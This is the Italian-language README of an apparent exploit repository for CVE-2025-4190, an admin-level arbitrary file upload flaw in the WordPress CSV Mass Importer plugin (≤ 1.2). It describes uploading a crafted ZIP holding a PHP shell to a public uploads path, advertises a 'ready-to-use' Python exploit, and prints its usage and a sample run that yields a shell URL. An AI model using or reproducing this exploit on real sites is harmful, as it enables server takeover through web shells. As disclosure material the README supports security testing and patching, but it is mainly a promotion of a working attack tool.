
CSV Mass Importer <= 1.2 - Admin+ Upload arbitrario di file
Il plugin CSV Mass Importer (≤ 1.2) per WordPress contiene una vulnerabilità di Upload Arbitrario di File (Admin+).
A causa di una convalida impropria dei file caricati, gli utenti con privilegi elevati (come l'admin) possono caricare file arbitrari sul server, anche quando questo dovrebbe essere limitato — ad esempio nelle configurazioni multisito.
Questa vulnerabilità consente a un attaccante di caricare shell PHP o file dannosi, portando a remote code execution (RCE) sul server.
Scoperta da Nxploited (Khaled Alenazi).
Il plugin non controlla correttamente i file caricati quando si utilizza la funzionalità di importazione CSV.
Un file ZIP appositamente predisposto contenente una shell PHP può essere caricato ed estratto in una directory accessibile pubblicamente.
Esempio di Percorso della Shell:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
Questo repository contiene uno script exploit Python pronto all'uso: 4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
Questo codice è fornito esclusivamente a scopo didattico.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script.
Usalo in modo responsabile e solo su sistemi che sei autorizzato a testare.
Scoperto e sviluppato da Khaled Alenazi (Nxploited) 🌟